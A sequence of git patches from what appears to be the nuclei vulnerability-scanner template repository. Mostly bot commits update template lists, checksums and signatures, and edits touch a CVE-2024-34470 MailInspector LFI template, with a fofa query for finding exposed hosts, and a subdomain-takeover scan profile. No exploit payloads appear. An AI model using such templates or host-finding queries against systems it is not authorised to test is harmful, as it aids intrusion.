index e8a76f84af..87eaaf9587 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -38,6 +38,7 @@ on: - 'http/misconfiguration/installer/mura-cms-setup-installer.yaml' - 'http/misconfiguration/installer/onlyoffice-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' + - 'http/misconfiguration/installer/pandora-fms-installer.yaml' - 'http/misconfiguration/installer/profittrailer-installer.yaml' - 'http/misconfiguration/installer/projectsend-installer.yaml' - 'http/misconfiguration/installer/snipe-it-installer.yaml' From 8d58f6fc6a76a8bdd002a58a89e95ac29b587298 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 13:12:16 +0000 Subject: [PATCH 489/847] Auto Generated New Template Addition List [Thu May 30 13:12:16 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6e36481c61..94b253118d 100644 --- a/.new-additions +++ b/.new-additions @@ -42,6 +42,7 @@ http/misconfiguration/installer/tastyigniter-installer.yaml http/misconfiguration/installer/ubersmith-installer.yaml http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml http/misconfiguration/installer/virtual-smartzone-installer.yaml +http/misconfiguration/installer/wowonder-installer.yaml http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From 9ffdf1e45268e409c4e4b0245fce92ab4505e272 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 13:12:41 +0000 Subject: [PATCH 490/847] Auto Generated Templates Checksum [Thu May 30 13:12:41 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c8e7f5cea2..00e3ab6713 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5547,6 +5547,7 @@ http/misconfiguration/installer/webtrees-install.yaml:373a89cc6c65f6d44a4b7fd764 http/misconfiguration/installer/webuzo-installer.yaml:dc4d1a58f425cb8fb42cbc5280cc2ab9cbbb991d http/misconfiguration/installer/wiki-js-installer.yaml:21c556bd08a12c651f419ccc23b69d2980c55a1c http/misconfiguration/installer/wowcms-installer.yaml:6df79c7601fd21994a52333494a91a3d653f0573 +http/misconfiguration/installer/wowonder-installer.yaml:b4ed4185d602e7c9aea4dcc2622d1e140caa5611 http/misconfiguration/installer/wp-install.yaml:f09020cd3e1b61762935c650fe0ba42d659657e9 http/misconfiguration/installer/xbackbone-installer.yaml:f5578c7d92a21b929a48e7a9569f6e00db6466b7 http/misconfiguration/installer/yzmcms-installer.yaml:cfd51c27e2bd7ce0dad274cf7d3d8a81519f6d74 @@ -8605,7 +8606,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:855e4ff1ac258da766e247c5568bab892a99454b +templates-checksum.txt:34c2abcb0998167e9f679484f57a3362db493576 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From fda2fdcb9ad67df41fa344f5409a07ed27ca90db Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 13:13:05 +0000 Subject: [PATCH 491/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 87eaaf9587..0dcbf6fde8 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -47,6 +47,7 @@ on: - 'http/misconfiguration/installer/ubersmith-installer.yaml' - 'http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml' - 'http/misconfiguration/installer/virtual-smartzone-installer.yaml' + - 'http/misconfiguration/installer/wowonder-installer.yaml' - 'http/technologies/gotweb-detect.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' From 875a36fd2d6f3ec1b9b0bfad733f4c8802fd055c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 13:14:27 +0000 Subject: [PATCH 492/847] Auto Generated New Template Addition List [Thu May 30 13:14:27 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 94b253118d..a3ac7ad463 100644 --- a/.new-additions +++ b/.new-additions @@ -20,6 +20,7 @@ http/exposures/tokens/wechat/wechat-secret-key.yaml http/iot/netgear-boarddataww-rce.yaml http/misconfiguration/cubebackup-setup-installer.yaml http/misconfiguration/installer/activecollab-installer.yaml +http/misconfiguration/installer/call-com-installer.yaml http/misconfiguration/installer/cms-made-simple-installer.yaml http/misconfiguration/installer/ejbca-enterprise-installer.yaml http/misconfiguration/installer/flarum-installer.yaml From 0df37a6c00b6606258e6e6f61b7df2abd21dccf7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 13:14:35 +0000 Subject: [PATCH 493/847] Auto Generated Templates Checksum [Thu May 30 13:14:35 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 00e3ab6713..197ce97fad 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5311,7 +5311,7 @@ http/misconfiguration/confluence/confluence-oauth-admin.yaml:1e5391747c88bfa3e3b http/misconfiguration/confluence-dashboard.yaml:e80a9c76f4cb07a076e2345877ddee3a721b5dd0 http/misconfiguration/cookies-without-httponly-secure.yaml:96433be16faef9b269fa66484b578933815e1e51 http/misconfiguration/corebos-htaccess.yaml:c292dd25e289347ac281d4ce493839827da70784 -http/misconfiguration/cubebackup-setup-installer.yaml:c0084ca8adbf6ed8d4251e66f507c52c616174f8 +http/misconfiguration/cubebackup-setup-installer.yaml:1e8262b8451a65083cc49135bb49f64bd33f5cf3 http/misconfiguration/cx-cloud-upload-detect.yaml:d971d4aa14a8b003126d9e7c15b33aa2406d963b http/misconfiguration/d-link-arbitary-fileread.yaml:502347b551dfb97a21f2b321e5de24d42cc1f5ce http/misconfiguration/database-error.yaml:dc9ac279976c76b9957baf5076fccd7722d1c9ce @@ -5411,6 +5411,7 @@ http/misconfiguration/installer/binom-installer.yaml:52fe9fec98513d2febd3133b230 http/misconfiguration/installer/bitrix24-installer.yaml:e49ccadcbb628a1ab1f2db64a2cb733aa44be3a1 http/misconfiguration/installer/blesta-installer.yaml:686fc1c3b634d6ab95ad99034ec7dcb360e7ecba http/misconfiguration/installer/businesso-installer.yaml:7e15b8f657b06411a8c1746dfae68bbb09a3dd62 +http/misconfiguration/installer/call-com-installer.yaml:4d270a0817e615dc4d4584e614c6c50abb40ba89 http/misconfiguration/installer/chamilo-installer.yaml:a0c0b5aeeb609610b3c88360075ed6dca0c7d4be http/misconfiguration/installer/circarlife-setup.yaml:a156b34f363e32ba5b727edf8e4c1334c8d7c49a http/misconfiguration/installer/clipbucket-installer.yaml:953b61e17da228a814a1ea84ac3ff2e0579a4804 @@ -8606,7 +8607,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:34c2abcb0998167e9f679484f57a3362db493576 +templates-checksum.txt:7ffc21bfacd042b65105e4d9c06adb54a08d8500 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 833d619de148a1b35f3c051876395e4eff483ff9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 13:15:12 +0000 Subject: [PATCH 495/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 0dcbf6fde8..2621b0c394 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -25,6 +25,7 @@ on: - 'http/iot/netgear-boarddataww-rce.yaml' - 'http/misconfiguration/cubebackup-setup-installer.yaml' - 'http/misconfiguration/installer/activecollab-installer.yaml' + - 'http/misconfiguration/installer/call-com-installer.yaml' - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' - 'http/misconfiguration/installer/ejbca-enterprise-installer.yaml' - 'http/misconfiguration/installer/flarum-installer.yaml' From ba6e4cc76c3b908a56dfa5bc4f9a3bec591c0154 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 13:15:33 +0000 Subject: [PATCH 497/847] Auto Generated Templates Checksum [Thu May 30 13:15:33 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 197ce97fad..3545a23a05 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2182,7 +2182,7 @@ http/cves/2021/CVE-2021-29484.yaml:f78e59f184d5c43ff7966a2b6fba00554446b9d1 http/cves/2021/CVE-2021-29490.yaml:40b5bea457e707732739b67380abd7976c51f14d http/cves/2021/CVE-2021-29505.yaml:499c17d9f306975010f29ed644e4c232907941b4 http/cves/2021/CVE-2021-29622.yaml:79b2ae7f2667471da099f5594f532bbc00626580 -http/cves/2021/CVE-2021-29625.yaml:89de3db861b7d733e2ba3aa140262d92187a64c5 +http/cves/2021/CVE-2021-29625.yaml:6b71626492d0e4d058f7c62d229a939065b84bad http/cves/2021/CVE-2021-3002.yaml:60618324e66630690c4b85faf6a5b38817601897 http/cves/2021/CVE-2021-30049.yaml:da78546d4d231f264cf840eedd0596d543ab9453 http/cves/2021/CVE-2021-30128.yaml:5d3c104ca678614f3c0b970fd3dab9975f35878c @@ -3047,7 +3047,7 @@ http/cves/2023/CVE-2023-33338.yaml:64557689950914621e4b59c37bab423ac5ad636a http/cves/2023/CVE-2023-33405.yaml:fd578aece75fa256b7e9d6fbfd1d5beac0ac400c http/cves/2023/CVE-2023-33439.yaml:6833de5b8a09afccde10c5b536eef39c01a431f2 http/cves/2023/CVE-2023-33440.yaml:80e2c509f89e2ff0b83e6b8d548a3d4bf4eeb2e0 -http/cves/2023/CVE-2023-3345.yaml:2c12dba415df031f2c8e2718b5e3a7e7927a89c4 +http/cves/2023/CVE-2023-3345.yaml:f463a1c7cdd257be67891de77bb6ac818625db98 http/cves/2023/CVE-2023-33510.yaml:a280edbd1c1acfede9382deb4138cb4494733edc http/cves/2023/CVE-2023-33568.yaml:1ad32800fd0219a8f89f6064e3fce39880d56f29 http/cves/2023/CVE-2023-33584.yaml:b4310ef83324d4f6e1e0d74751be0f3a82f927a3 @@ -8607,7 +8607,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7ffc21bfacd042b65105e4d9c06adb54a08d8500 +templates-checksum.txt:f899afa37656c02d582deae360e340f004c2784d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 041ed599f5eb70b2af0ef0e814a0b20e2a894a31 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 13:16:15 +0000 Subject: [PATCH 498/847] Auto Template Signing [Thu May 30 13:16:15 UTC 2024] :robot: --- http/misconfiguration/installer/call-com-installer.yaml | 1 + http/misconfiguration/installer/mura-cms-setup-installer.yaml | 1 + http/misconfiguration/installer/pandora-fms-installer.yaml | 1 + http/misconfiguration/installer/wowonder-installer.yaml | 1 + 4 files changed, 4 insertions(+) diff --git a/http/misconfiguration/installer/call-com-installer.yaml b/http/misconfiguration/installer/call-com-installer.yaml index 75c0bb2f99..fa9061a8a2 100644 --- a/http/misconfiguration/installer/call-com-installer.yaml +++ b/http/misconfiguration/installer/call-com-installer.yaml @@ -31,3 +31,4 @@ http: - type: status status: - 200 +# digest: 490a004630440220279f9da2572a41913a0eb3bf60b546901afd18ad7278c3fa0d440bc58b60d39702200505b5407d2986b988c9a939e0294228166102d509b4fc3f60c287a81143c523:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/mura-cms-setup-installer.yaml b/http/misconfiguration/installer/mura-cms-setup-installer.yaml index 97a45a968f..b5cf256193 100644 --- a/http/misconfiguration/installer/mura-cms-setup-installer.yaml +++ b/http/misconfiguration/installer/mura-cms-setup-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502202cb137965db3e399264def6e54d44679dc44d0d1cef4ffa91514a291af287439022100c78b53b7a3cf5bb8cebcdefa23b6d1c2ce8985e2b4bd5a2087920d9204b17a0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/pandora-fms-installer.yaml b/http/misconfiguration/installer/pandora-fms-installer.yaml index 4592bf3ccc..c70fc9f577 100644 --- a/http/misconfiguration/installer/pandora-fms-installer.yaml +++ b/http/misconfiguration/installer/pandora-fms-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100fdb6af97358f0ce10670b4ef73349b318f49418f1ba095e0206a5527979a0a07022100f0435e94a7773c296cbf81ceb18e57fab50b9306573b92b83f7db2dac1770716:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/wowonder-installer.yaml b/http/misconfiguration/installer/wowonder-installer.yaml index a038f43ab2..9a5b3eb9f6 100644 --- a/http/misconfiguration/installer/wowonder-installer.yaml +++ b/http/misconfiguration/installer/wowonder-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4b0a004830460221009a5a2cc204c9ff35aebce83e319cd2c22ad4bbd6672b60facc2358c145525f7d022100fa304b531230e4c25c03410b6026764a4bbf5dd944643c0ad90c141bce68c692:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 82fed9e30622042443ed9bcf1e58212efa5ce3ac Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 30 May 2024 18:56:04 +0530 Subject: [PATCH 499/847] added flow --- http/cves/2024/CVE-2024-34470.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/http/cves/2024/CVE-2024-34470.yaml b/http/cves/2024/CVE-2024-34470.yaml index 5debe0b30e..84eaac19f9 100644 --- a/http/cves/2024/CVE-2024-34470.yaml +++ b/http/cves/2024/CVE-2024-34470.yaml @@ -10,6 +10,7 @@ info: - https://github.com/osvaldotenorio/CVE-2024-34470 - https://github.com/nomi-sec/PoC-in-GitHub - https://github.com/fkie-cad/nvd-json-data-feeds + - https://nvd.nist.gov/vuln/detail/CVE-2024-34470 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -17,10 +18,13 @@ info: epss-score: 0.00043 epss-percentile: 0.0866 metadata: + verified: true max-request: 1 fofa-query: "mailinspector/public" tags: cve,cve2024,lfi,mailinspector,hsc +flow: http(1) && http(2) + http: - method: GET path: From 9b1128b88f88151636b930f3da00da2388dd1077 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 13:28:58 +0000 Subject: [PATCH 500/847] Auto Generated New Template Addition List [Thu May 30 13:28:58 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a3ac7ad463..a35c11841a 100644 --- a/.new-additions +++ b/.new-additions @@ -6,6 +6,7 @@ http/cves/2023/CVE-2023-3077.yaml http/cves/2023/CVE-2023-48084.yaml http/cves/2024/CVE-2024-21683.yaml http/cves/2024/CVE-2024-24919.yaml +http/cves/2024/CVE-2024-34470.yaml http/cves/2024/CVE-2024-3495.yaml http/cves/2024/CVE-2024-5230.yaml http/default-logins/ampjuke-default-login.yaml From 50dd2d9d4721cbe9a96921d234137c88983900fd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 13:29:10 +0000 Subject: [PATCH 501/847] Auto Generated Templates Checksum [Thu May 30 13:29:10 UTC 2024] :robot: --- templates-checksum.txt | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3545a23a05..af30bcac10 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3309,6 +3309,7 @@ http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:ad19d994ed8f29c8ffca72103c5419713853271b http/cves/2024/CVE-2024-33724.yaml:22f067dc8bffa65e58284ba200cb9d7abb06d0d0 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c +http/cves/2024/CVE-2024-34470.yaml:b59fc0e9bbeff6177b5d37ddad097eebdc0e0ae4 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b @@ -5411,7 +5412,7 @@ http/misconfiguration/installer/binom-installer.yaml:52fe9fec98513d2febd3133b230 http/misconfiguration/installer/bitrix24-installer.yaml:e49ccadcbb628a1ab1f2db64a2cb733aa44be3a1 http/misconfiguration/installer/blesta-installer.yaml:686fc1c3b634d6ab95ad99034ec7dcb360e7ecba http/misconfiguration/installer/businesso-installer.yaml:7e15b8f657b06411a8c1746dfae68bbb09a3dd62 -http/misconfiguration/installer/call-com-installer.yaml:4d270a0817e615dc4d4584e614c6c50abb40ba89 +http/misconfiguration/installer/call-com-installer.yaml:571138a3c3d7ac78ff952718a9751da42ff05faf http/misconfiguration/installer/chamilo-installer.yaml:a0c0b5aeeb609610b3c88360075ed6dca0c7d4be http/misconfiguration/installer/circarlife-setup.yaml:a156b34f363e32ba5b727edf8e4c1334c8d7c49a http/misconfiguration/installer/clipbucket-installer.yaml:953b61e17da228a814a1ea84ac3ff2e0579a4804 @@ -5475,7 +5476,7 @@ http/misconfiguration/installer/monstra-installer.yaml:bcc03eec7693c2c9e5c960958 http/misconfiguration/installer/moodle-installer.yaml:79053437435e1590bb58eb747a87109c8c5d026b http/misconfiguration/installer/moosocial-installer.yaml:fcb42a5d3af9d846ec71cc165bde4962bb381c71 http/misconfiguration/installer/mosparo-install.yaml:0b6f15dce7c5579e4e7a2db365050972b8be308a -http/misconfiguration/installer/mura-cms-setup-installer.yaml:401479001b7098dfdd05509b12b0937fcb3de681 +http/misconfiguration/installer/mura-cms-setup-installer.yaml:fd70fc43a4eb276a7b3453e7b10c0a576c381ee2 http/misconfiguration/installer/nagiosxi-installer.yaml:3dbd7b4606de96c3d2ef86245924586928ade5c9 http/misconfiguration/installer/netsparker-enterprise-installer.yaml:87452a1aa538401b678c40487818511b300f67d2 http/misconfiguration/installer/nginx-auto-installer.yaml:ad565c9eee92dff96cc6487522724d96386339d9 @@ -5494,7 +5495,7 @@ http/misconfiguration/installer/orangescrum-install.yaml:a8eed9d3051fb349be44b0c http/misconfiguration/installer/owncloud-installer-exposure.yaml:66cb802db3587a09427dc183b8df0e94ca3fe2d8 http/misconfiguration/installer/oxid-eshop-installer.yaml:f5a2e54a7f5c13e18209df8cb2830e095c83ba5c http/misconfiguration/installer/pagekit-installer.yaml:eb1972138f70ad53ae1b4ef6f5004d9470fdaee6 -http/misconfiguration/installer/pandora-fms-installer.yaml:78f905cee7803a1ef39ef1a23190a35a2bf8fcf0 +http/misconfiguration/installer/pandora-fms-installer.yaml:d9c01ab04b2a5b72a06702a6f26768d5fd6b829a http/misconfiguration/installer/permissions-installer.yaml:ffeca03066710cc2c3ac03565db2994d603c8537 http/misconfiguration/installer/phpbb-installer.yaml:5f50f480c25285283d3f0704aa52afc97a43483a http/misconfiguration/installer/phpgedview-installer.yaml:c3abf511068283554097640a87a899102a008d08 @@ -5548,7 +5549,7 @@ http/misconfiguration/installer/webtrees-install.yaml:373a89cc6c65f6d44a4b7fd764 http/misconfiguration/installer/webuzo-installer.yaml:dc4d1a58f425cb8fb42cbc5280cc2ab9cbbb991d http/misconfiguration/installer/wiki-js-installer.yaml:21c556bd08a12c651f419ccc23b69d2980c55a1c http/misconfiguration/installer/wowcms-installer.yaml:6df79c7601fd21994a52333494a91a3d653f0573 -http/misconfiguration/installer/wowonder-installer.yaml:b4ed4185d602e7c9aea4dcc2622d1e140caa5611 +http/misconfiguration/installer/wowonder-installer.yaml:74af794a0e03a1bf19514d1d6817c2a43fe4ea6a http/misconfiguration/installer/wp-install.yaml:f09020cd3e1b61762935c650fe0ba42d659657e9 http/misconfiguration/installer/xbackbone-installer.yaml:f5578c7d92a21b929a48e7a9569f6e00db6466b7 http/misconfiguration/installer/yzmcms-installer.yaml:cfd51c27e2bd7ce0dad274cf7d3d8a81519f6d74 @@ -8607,7 +8608,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f899afa37656c02d582deae360e340f004c2784d +templates-checksum.txt:eb95e252e41fe29c34a9560995a9af0f0aa37d01 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ecc638461b82a0f5a63eefbefe065dfe1dbc73e6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 13:29:50 +0000 Subject: [PATCH 502/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 2621b0c394..3e468cfa82 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,6 +11,7 @@ on: - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/cves/2024/CVE-2024-21683.yaml' - 'http/cves/2024/CVE-2024-24919.yaml' + - 'http/cves/2024/CVE-2024-34470.yaml' - 'http/cves/2024/CVE-2024-3495.yaml' - 'http/cves/2024/CVE-2024-5230.yaml' - 'http/default-logins/ampjuke-default-login.yaml' From 225364d4a2f2d7292dfceb82f661124029726481 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 13:30:49 +0000 Subject: [PATCH 503/847] Auto Template Signing [Thu May 30 13:30:49 UTC 2024] :robot: --- http/cves/2021/CVE-2021-29625.yaml | 2 +- http/cves/2023/CVE-2023-3345.yaml | 2 +- http/cves/2024/CVE-2024-34470.yaml | 1 + 3 files changed, 3 insertions(+), 2 deletions(-) diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml index 178b6cad21..1f9d7e12c6 100644 --- a/http/cves/2021/CVE-2021-29625.yaml +++ b/http/cves/2021/CVE-2021-29625.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203bbedb78e2e0bddd6d7b3eefa0c1fca62d18deb2759881cb15089fbac64253a0022100cc7857e4cfd08807f6efcec5c623f04693979c11de46feee3edb0b5ec2ba53db:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200cdb22c1e900a0bffa916eead65b983954ac251a9cf37416e6a859bea4bfba74022056442b9d14d2fdaee049ad30401ec38f4ec53804185bf6b6b15df8df7f6914d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3345.yaml b/http/cves/2023/CVE-2023-3345.yaml index 5fdc791a55..9004991282 100644 --- a/http/cves/2023/CVE-2023-3345.yaml +++ b/http/cves/2023/CVE-2023-3345.yaml @@ -75,4 +75,4 @@ http: regex: - '"nonce":"([a-z0-9]+)","versionString' internal: true -# digest: 490a0046304402204cddd6c9737174b06878b047f621154b32a59366060b58df57cbb1318e18e4e1022059195669346394d99d71b58326ae9be8679220489112cbd7e6e09528a8ab05a6:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d9d214d95910b9ab36686cebb68a0c698a36dcd4f494d1ba91e3d9c36a77cc66022100b58afe9567fddc352d339dfa985e55105c2184de7b06d0a2a756ba07e34d1979:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-34470.yaml b/http/cves/2024/CVE-2024-34470.yaml index 84eaac19f9..f61ad1d0e7 100644 --- a/http/cves/2024/CVE-2024-34470.yaml +++ b/http/cves/2024/CVE-2024-34470.yaml @@ -51,3 +51,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100b5aab6fe35d6181963300dc1caea35fb8dd70f83613f032e088a5ddb1a199f3602206474aa1192edf553bb5ac6a3e5d30c743a8c1357ba6b0deb2585b3bcb44f4ffd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fc1a50fec34ed4eef4416071e7e6c206fc57556b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 15:58:36 +0000 Subject: [PATCH 505/847] Auto Template Signing [Thu May 30 15:58:36 UTC 2024] :robot: --- http/exposed-panels/oracle-business-control.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/oracle-business-control.yaml b/http/exposed-panels/oracle-business-control.yaml index a9d286a7a3..4c75837dae 100644 --- a/http/exposed-panels/oracle-business-control.yaml +++ b/http/exposed-panels/oracle-business-control.yaml @@ -38,3 +38,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402204c37db3664c3092a02d62e172d048d01d2ed6681c6ec1edc3ead1ded8e249a9a022042046755baf85576ddb93246b0bfdbe859eecdd41baf1926bb4c6d8b1d13b721:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ec0f074ef5ecc782f581aaa2d446aca634e23f67 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Fri, 31 May 2024 01:06:53 +0530 Subject: [PATCH 506/847] Update subdomain-takeovers.yml --- profiles/subdomain-takeovers.yml | 24 ++++++++++++++++++------ 1 file changed, 18 insertions(+), 6 deletions(-) diff --git a/profiles/subdomain-takeovers.yml b/profiles/subdomain-takeovers.yml index 5591c8551b..a70812bc23 100644 --- a/profiles/subdomain-takeovers.yml +++ b/profiles/subdomain-takeovers.yml @@ -1,9 +1,21 @@ -# This is a configuration file for the subdomain takeover template profile. -# Additional configuration profiles can be created for different types of nuclei scans. -# They should be placed under the 'config' directory at: -# https://github.com/projectdiscovery/nuclei-templates -# Here is an example of how to use a config profile: -# nuclei -config config/osint.yml -list target_list_to_scan.txt +# Nuclei Configuration Profile for Subdomain Takeover Detection +# +# This configuration file is specifically tailored for detecting subdomain takeovers using Nuclei. +# +# Purpose: +# This profile is focused on identifying subdomain takeover vulnerabilities across different cloud service providers. +# Subdomain takeovers can occur when a DNS entry points to a deprovisioned or unclaimed cloud resource, potentially +# allowing an attacker to claim the resource and hijack the subdomain. +# +# Included Templates: +# This configuration references specific templates designed to detect subdomain takeover scenarios: +# - http/takeovers/: This directory contains general templates for detecting HTTP-based subdomain takeovers. +# - dns/azure-takeover-detection.yaml: This template specifically checks for subdomain takeovers on Microsoft Azure. +# - dns/elasticbeanstalk-takeover.yaml: This template specifically checks for subdomain takeovers on AWS Elastic Beanstalk. +# +# Running this profile +# You can run this profile using the following command : +# nuclei -profile subdomain-takeovers -u https://www.example.com templates: - http/takeovers/ From bbeeddffbc3f67cdae1bce299410b256267a0f30 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 05:15:18 +0000 Subject: [PATCH 508/847] Auto Generated Templates Checksum [Fri May 31 05:15:18 UTC 2024] :robot: --- templates-checksum.txt | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index af30bcac10..24618f3b47 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2182,7 +2182,7 @@ http/cves/2021/CVE-2021-29484.yaml:f78e59f184d5c43ff7966a2b6fba00554446b9d1 http/cves/2021/CVE-2021-29490.yaml:40b5bea457e707732739b67380abd7976c51f14d 